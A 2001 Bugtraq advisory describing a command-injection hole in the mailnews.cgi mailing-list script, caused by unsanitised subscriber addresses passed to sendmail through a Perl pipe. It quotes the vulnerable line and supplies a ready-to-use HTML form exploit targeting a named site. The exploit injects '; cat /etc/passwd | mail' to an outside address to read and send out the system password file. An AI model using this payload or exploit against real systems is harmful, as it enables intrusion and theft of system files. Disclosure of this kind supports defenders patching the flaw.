Date: Sun, 18 Feb 2001 22:04:54 +0000 (GMT)
From: Kanedaaa Bohater <kaneda>
To:  <bugtraq@securityfocus.com>
Subject: CGI - mailnews.cgi vulnerability...

Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:

<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

Author dont parse some characters and he use very stupid "password
protection". We can add or delete users from maillist without known
admin password. But this is small problem ;] . Lets see what we can do
more.
<cat source>
	open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail
adam@malysz.pl' and use subroutine to execute this code :]

Simple exploit in html:

<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ;  [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<INPUT  TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who :	Kanedaaa


***$$$###  " I moze bardzo wielu nie zrozumie tych slow...
		Ale nie ma litosci dla SKURWYSYNOW .... " ###$$*